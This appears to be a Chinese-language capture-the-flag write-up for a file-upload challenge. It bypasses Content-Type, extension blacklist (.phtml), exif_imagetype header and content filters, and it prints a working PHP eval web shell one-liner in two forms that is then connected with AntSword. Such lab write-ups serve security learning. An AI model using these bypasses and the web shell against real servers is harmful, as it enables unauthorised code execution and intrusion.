0x00
打开界面,发现是一道上传题
首先我们来测试一下上传的文件类型,新建一个文件命名为1.jpg,进行上传,得到
根据提示我们可以猜测到,对文件头进行了检测,这里我们假设使用的是exif_imagetype函数,在文件里第一行加上GIF89a来绕过,上传得到结果如下
上传成功,说明我们的假设是正确的,我们将文件重新命名为1.php,进行上传,得到结果如下
说明对文件的拓展名也进行了过滤,进行模糊测试,发现与php相关的全被过滤掉
通过谷歌插件看到站点使用的是nginx,上传.user.ini也上传失败
我们继续假设后端对数据包的Content-Type类型进行了过滤,来进行测试,上传1.php并且通过BurpSuite进行如下修改
得到结果如下,说明后端还对拓展名进行了过滤,继续进行模糊测试
模糊测试后发现没有过滤phtml,上传结果如下
接下来我们上传一句话木马,将1.phtml的内容改为如下
GIF89a
<?php @eval($_POST['pass']);?>
得到结果如下,对内容也进行了过滤
我们将1.phtml的内容改为如下来绕过
GIF89a
<script language="php">@eval($_POST['pass']);</script>
上传后得到如下结果
我们打开1.phtml,经过一系列测试发现被上传到了upload路径下,访问结果如下
打开蚁剑进行连接
获取flag
0x01 总结
-
1.Content-Type绕过
-
2.黑名单绕过
-
3.exif_imagetype函数绕过
-
4.内容过滤
<?绕过
<?php @eval($_POST['pass']); ?>
## 替换为如下
<script language="php">@eval($_POST['pass']);</script>